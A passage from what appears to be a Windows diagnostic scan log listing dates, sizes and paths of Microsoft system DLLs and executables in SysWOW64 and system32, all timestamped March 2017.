2017-03-14 15:45 - 2017-03-04 03:29 - 00112640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssitlb.dll
2017-03-14 15:45 - 2017-03-04 03:29 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctfp.dll
2017-03-14 15:45 - 2017-03-04 03:29 - 00039424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XInputUap.dll
2017-03-14 15:45 - 2017-03-04 03:29 - 00019968 _____ C:\WINDOWS\SysWOW64\GamePanelExternalHook.dll
2017-03-14 15:45 - 2017-03-04 03:28 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2017-03-14 15:45 - 2017-03-04 03:27 - 00275968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\accountaccessor.dll
2017-03-14 15:45 - 2017-03-04 03:27 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Radios.dll
2017-03-14 15:45 - 2017-03-04 03:27 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\findnetprinters.dll
2017-03-14 15:45 - 2017-03-04 03:27 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ddrawex.dll
2017-03-14 15:45 - 2017-03-04 03:26 - 00177664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll
2017-03-14 15:45 - 2017-03-04 03:26 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.dll
2017-03-14 15:45 - 2017-03-04 03:26 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BcastDVRHelper.dll
2017-03-14 15:45 - 2017-03-04 03:26 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll
2017-03-14 15:45 - 2017-03-04 03:26 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2017-03-14 15:45 - 2017-03-04 03:26 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.HostName.dll
2017-03-14 15:45 - 2017-03-04 03:26 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.UI.GameBar.dll
2017-03-14 15:45 - 2017-03-04 03:26 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Shell.Search.UriHandler.dll
2017-03-14 15:45 - 2017-03-04 03:26 - 00038912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfdprov.dll
2017-03-14 15:45 - 2017-03-04 03:26 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netiougc.exe
2017-03-14 15:45 - 2017-03-04 03:25 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\unimdm.tsp
2017-03-14 15:45 - 2017-03-04 03:25 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mscandui.dll
2017-03-14 15:45 - 2017-03-04 03:25 - 00175104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\puiapi.dll
2017-03-14 15:45 - 2017-03-04 03:25 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCCSEngineShared.dll
2017-03-14 15:45 - 2017-03-04 03:25 - 00136192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinRtTracing.dll
2017-03-14 15:45 - 2017-03-04 03:25 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BrowserSettingSync.dll
2017-03-14 15:45 - 2017-03-04 03:25 - 00097792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.SystemManagement.dll
2017-03-14 15:45 - 2017-03-04 03:25 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tbauth.dll
2017-03-14 15:45 - 2017-03-04 03:24 - 00328192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-03-14 15:45 - 2017-03-04 03:24 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scksp.dll
2017-03-14 15:45 - 2017-03-04 03:24 - 00142336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFi.dll
2017-03-14 15:45 - 2017-03-04 03:24 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SerialCommunication.dll
2017-03-14 15:45 - 2017-03-04 03:24 - 00093184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctfui.dll
2017-03-14 15:45 - 2017-03-04 03:24 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.Ngc.dll
2017-03-14 15:45 - 2017-03-04 03:24 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.ServiceDiscovery.Dnssd.dll
2017-03-14 15:45 - 2017-03-04 03:24 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerCookies.exe
2017-03-14 15:45 - 2017-03-04 03:23 - 00531456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iprtrmgr.dll
2017-03-14 15:45 - 2017-03-04 03:23 - 00506368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2017-03-14 15:45 - 2017-03-04 03:23 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll
2017-03-14 15:45 - 2017-03-04 03:23 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.LowLevel.dll
2017-03-14 15:45 - 2017-03-04 03:23 - 00334848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DavSyncProvider.dll
2017-03-14 15:45 - 2017-03-04 03:23 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll
2017-03-14 15:45 - 2017-03-04 03:23 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2017-03-14 15:45 - 2017-03-04 03:23 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Search.ProtocolHandler.MAPI2.dll
2017-03-14 15:45 - 2017-03-04 03:23 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2017-03-14 15:45 - 2017-03-04 03:23 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll
2017-03-14 15:45 - 2017-03-04 03:23 - 00172032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netiohlp.dll
2017-03-14 15:45 - 2017-03-04 03:22 - 01299968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-03-14 15:45 - 2017-03-04 03:22 - 00332288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapConfiguration.dll
2017-03-14 15:45 - 2017-03-04 03:22 - 00265728 _____ C:\WINDOWS\SysWOW64\Windows.Perception.Stub.dll
2017-03-14 15:45 - 2017-03-04 03:22 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll
2017-03-14 15:45 - 2017-03-04 03:22 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-03-14 15:45 - 2017-03-04 03:22 - 00230912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\icm32.dll
2017-03-14 15:45 - 2017-03-04 03:22 - 00212992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cemapi.dll
2017-03-14 15:45 - 2017-03-04 03:22 - 00183296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchFilterHost.exe
2017-03-14 15:45 - 2017-03-04 03:22 - 00117760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthBroker.dll
2017-03-14 15:45 - 2017-03-04 03:22 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DafPrintProvider.dll
2017-03-14 15:45 - 2017-03-04 03:21 - 01243136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.FaceAnalysis.dll
2017-03-14 15:45 - 2017-03-04 03:21 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.PointOfService.dll
2017-03-14 15:45 - 2017-03-04 03:21 - 00631296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\main.cpl
2017-03-14 15:45 - 2017-03-04 03:21 - 00609280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Import.dll
2017-03-14 15:45 - 2017-03-04 03:21 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\nshwfp.dll
2017-03-14 15:45 - 2017-03-04 03:21 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.AllJoyn.dll
2017-03-14 15:45 - 2017-03-04 03:21 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2017-03-14 15:45 - 2017-03-04 03:21 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2017-03-14 15:45 - 2017-03-04 03:21 - 00202752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.HumanInterfaceDevice.dll
2017-03-14 15:45 - 2017-03-04 03:21 - 00196608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tapi32.dll
2017-03-14 15:45 - 2017-03-04 03:21 - 00185856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll
2017-03-14 15:45 - 2017-03-04 03:20 - 13873664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-03-14 15:45 - 2017-03-04 03:20 - 00632832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sud.dll
2017-03-14 15:45 - 2017-03-04 03:20 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SmartCards.dll
2017-03-14 15:45 - 2017-03-04 03:20 - 00534528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PCPTpm12.dll
2017-03-14 15:45 - 2017-03-04 03:20 - 00506880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll
2017-03-14 15:45 - 2017-03-04 03:20 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Wallet.dll
2017-03-14 15:45 - 2017-03-04 03:20 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2017-03-14 15:45 - 2017-03-04 03:20 - 00424960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msutb.dll
2017-03-14 15:45 - 2017-03-04 03:20 - 00386048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFiDirect.dll
2017-03-14 15:45 - 2017-03-04 03:20 - 00368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanui.dll
2017-03-14 15:45 - 2017-03-04 03:20 - 00325120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2017-03-14 15:45 - 2017-03-04 03:20 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepsync.dll
2017-03-14 15:45 - 2017-03-04 03:20 - 00271360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2017-03-14 15:45 - 2017-03-04 03:20 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WwaApi.dll
2017-03-14 15:45 - 2017-03-04 03:20 - 00206336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vaultcli.dll
2017-03-14 15:45 - 2017-03-04 03:20 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2017-03-14 15:45 - 2017-03-04 03:20 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepapi.dll
2017-03-14 15:45 - 2017-03-04 03:19 - 00714752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssvp.dll
2017-03-14 15:45 - 2017-03-04 03:19 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mbsmsapi.dll
2017-03-14 15:45 - 2017-03-04 03:19 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll
2017-03-14 15:45 - 2017-03-04 03:19 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2017-03-14 15:45 - 2017-03-04 03:19 - 00390656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2017-03-14 15:45 - 2017-03-04 03:19 - 00318464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchFolder.dll
2017-03-14 15:45 - 2017-03-04 03:19 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Picker.dll
2017-03-14 15:45 - 2017-03-04 03:19 - 00226816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore6.dll
2017-03-14 15:45 - 2017-03-04 03:19 - 00181760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tcpipcfg.dll
2017-03-14 15:45 - 2017-03-04 03:18 - 01231360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wcnwiz.dll
2017-03-14 15:45 - 2017-03-04 03:18 - 00896512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontext.dll
2017-03-14 15:45 - 2017-03-04 03:18 - 00819200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppContracts.dll
2017-03-14 15:45 - 2017-03-04 03:18 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Ocr.dll
2017-03-14 15:45 - 2017-03-04 03:18 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
2017-03-14 15:45 - 2017-03-04 03:18 - 00548352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ddraw.dll
2017-03-14 15:45 - 2017-03-04 03:18 - 00525824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintDialogs.dll
2017-03-14 15:45 - 2017-03-04 03:18 - 00314368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Usb.dll
2017-03-14 15:45 - 2017-03-04 03:18 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2017-03-14 15:45 - 2017-03-04 03:18 - 00254464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssphtb.dll
2017-03-14 15:45 - 2017-03-04 03:18 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2017-03-14 15:45 - 2017-03-04 03:18 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssph.dll
2017-03-14 15:45 - 2017-03-04 03:18 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2017-03-14 15:45 - 2017-03-04 03:17 - 00529920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StructuredQuery.dll
2017-03-14 15:45 - 2017-03-04 03:17 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2017-03-14 15:45 - 2017-03-04 03:17 - 00238080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2017-03-14 15:45 - 2017-03-04 03:16 - 01456640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2017-03-14 15:45 - 2017-03-04 03:16 - 00968704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2017-03-14 15:45 - 2017-03-04 03:16 - 00858112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2017-03-14 15:45 - 2017-03-04 03:16 - 00850432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasgcw.dll
2017-03-14 15:45 - 2017-03-04 03:16 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NaturalLanguage6.dll
2017-03-14 15:45 - 2017-03-04 03:16 - 00762880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprddm.dll
2017-03-14 15:45 - 2017-03-04 03:16 - 00760832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2017-03-14 15:45 - 2017-03-04 03:16 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-03-14 15:45 - 2017-03-04 03:16 - 00636928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll
2017-03-14 15:45 - 2017-03-04 03:16 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2017-03-14 15:45 - 2017-03-04 03:16 - 00526336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mscms.dll
2017-03-14 15:45 - 2017-03-04 03:16 - 00500224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.dll
2017-03-14 15:45 - 2017-03-04 03:16 - 00465920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppBroker.dll
2017-03-14 15:45 - 2017-03-04 03:16 - 00368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\puiobj.dll
2017-03-14 15:45 - 2017-03-04 03:16 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CryptoWinRT.dll
2017-03-14 15:45 - 2017-03-04 03:15 - 01543680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmc.exe
2017-03-14 15:45 - 2017-03-04 03:15 - 00509440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-03-14 15:45 - 2017-03-04 03:15 - 00336384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\azroleui.dll
2017-03-14 15:45 - 2017-03-04 03:15 - 00313856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2017-03-14 15:45 - 2017-03-04 03:14 - 01534464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.3D.dll
2017-03-14 15:45 - 2017-03-04 03:14 - 00236032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmWmiPl.dll
2017-03-14 15:45 - 2017-03-04 03:13 - 07626752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-03-14 15:45 - 2017-03-04 03:13 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
2017-03-14 15:45 - 2017-03-04 03:13 - 04613120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-03-14 15:45 - 2017-03-04 03:13 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-03-14 15:45 - 2017-03-04 03:13 - 02458112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themecpl.dll
2017-03-14 15:45 - 2017-03-04 03:13 - 01228288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usercpl.dll
2017-03-14 15:45 - 2017-03-04 03:13 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2017-03-14 15:45 - 2017-03-04 03:13 - 00675840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll
2017-03-14 15:45 - 2017-03-04 03:13 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2017-03-14 15:45 - 2017-03-04 03:13 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll
2017-03-14 15:45 - 2017-03-04 03:13 - 00256512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2017-03-14 15:45 - 2017-03-04 03:12 - 00901120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2017-03-14 15:45 - 2017-03-04 03:12 - 00886272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-03-14 15:45 - 2017-03-04 03:12 - 00884224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2017-03-14 15:45 - 2017-03-04 03:12 - 00700416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.Search.dll
2017-03-14 15:45 - 2017-03-04 03:12 - 00589312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Sensors.dll
2017-03-14 15:45 - 2017-03-04 03:12 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmenrollengine.dll
2017-03-14 15:45 - 2017-03-04 03:11 - 01357312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSPhotography.dll
2017-03-14 15:45 - 2017-03-04 03:11 - 01323008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll
2017-03-14 15:45 - 2017-03-04 03:11 - 01320448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll
2017-03-14 15:45 - 2017-03-04 03:11 - 01137152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll
2017-03-14 15:45 - 2017-03-04 03:11 - 00355328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RTMediaFrame.dll
2017-03-14 15:45 - 2017-03-04 03:10 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-03-14 15:45 - 2017-03-04 03:10 - 01077760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Editing.dll
2017-03-14 15:45 - 2017-03-04 03:10 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.BackgroundMediaPlayback.dll
2017-03-14 15:45 - 2017-03-04 03:10 - 00300544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\regedit.exe
2017-03-14 15:45 - 2017-03-04 03:10 - 00259584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msdtcuiu.dll
2017-03-14 15:45 - 2017-03-04 03:09 - 00795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MiracastReceiver.dll
2017-03-14 15:45 - 2017-03-04 03:09 - 00570368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll
2017-03-14 15:45 - 2017-03-04 03:09 - 00343040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll
2017-03-14 15:45 - 2017-03-04 03:09 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ProximityCommon.dll
2017-03-14 15:45 - 2017-03-04 03:08 - 03405312 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-03-14 15:45 - 2017-03-04 03:08 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-03-14 15:45 - 2017-03-04 03:07 - 02748928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll
2017-03-14 15:45 - 2017-03-04 03:07 - 02643456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-03-14 15:45 - 2017-03-04 03:07 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-03-14 15:45 - 2017-03-04 03:07 - 00895488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Streaming.dll
2017-03-14 15:45 - 2017-03-04 03:07 - 00545280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmkvsrcsnk.dll
2017-03-14 15:45 - 2017-03-04 03:06 - 06109184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2017-03-14 15:45 - 2017-03-04 03:06 - 05380608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2017-03-14 15:45 - 2017-03-04 03:06 - 03198464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2017-03-14 15:45 - 2017-03-04 03:06 - 02538496 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2017-03-14 15:45 - 2017-03-04 03:06 - 02153984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll
2017-03-14 15:45 - 2017-03-04 03:06 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToReceiver.dll
2017-03-14 15:45 - 2017-03-04 03:06 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-03-14 15:45 - 2017-03-04 03:05 - 07468544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-03-14 15:45 - 2017-03-04 03:05 - 03520512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xpsrchvw.exe
2017-03-14 15:45 - 2017-03-04 03:05 - 01221120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2017-03-14 15:45 - 2017-03-04 03:05 - 01133568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vssapi.dll
2017-03-14 15:45 - 2017-03-04 03:05 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll
2017-03-14 15:45 - 2017-03-04 03:05 - 00458752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidprov.dll
2017-03-14 15:45 - 2017-03-04 03:05 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\resutils.dll
2017-03-14 15:45 - 2017-03-04 03:05 - 00134144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ErrorDetails.dll
2017-03-14 15:45 - 2017-03-04 03:05 - 00089600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CameraCaptureUI.dll
2017-03-14 15:45 - 2017-03-04 03:04 - 00753152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imapi2fs.dll
2017-03-14 15:45 - 2017-03-04 03:04 - 00719872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_sr.dll
2017-03-14 15:45 - 2017-03-04 03:04 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2017-03-14 15:45 - 2017-03-04 03:03 - 02363904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2017-03-14 15:45 - 2017-03-04 03:03 - 02109952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll
2017-03-14 15:45 - 2017-03-04 03:03 - 01247232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll
2017-03-14 15:45 - 2017-03-04 03:03 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMVSENCD.DLL
2017-03-14 15:45 - 2017-03-04 03:03 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-03-14 15:45 - 2017-03-04 03:03 - 00359936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxclu.dll
2017-03-14 15:45 - 2017-03-04 03:02 - 04423680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-03-14 15:45 - 2017-03-04 03:02 - 02740224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2017-03-14 15:45 - 2017-03-04 03:02 - 02484736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gameux.dll
2017-03-14 15:45 - 2017-03-04 03:02 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-03-14 15:45 - 2017-03-04 03:02 - 01709056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2017-03-14 15:45 - 2017-03-04 03:02 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll
2017-03-14 15:45 - 2017-03-04 03:02 - 01155072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVP9DEC.dll
2017-03-14 15:45 - 2017-03-04 03:02 - 01004544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2017-03-14 15:45 - 2017-03-04 03:02 - 00580608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hgcpl.dll
2017-03-14 15:45 - 2017-03-04 03:01 - 02682880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netshell.dll
2017-03-14 15:45 - 2017-03-04 03:01 - 02646528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2017-03-14 15:45 - 2017-03-04 03:01 - 01993216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-03-14 15:45 - 2017-03-04 03:01 - 01988096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-03-14 15:45 - 2017-03-04 03:01 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Perception.dll
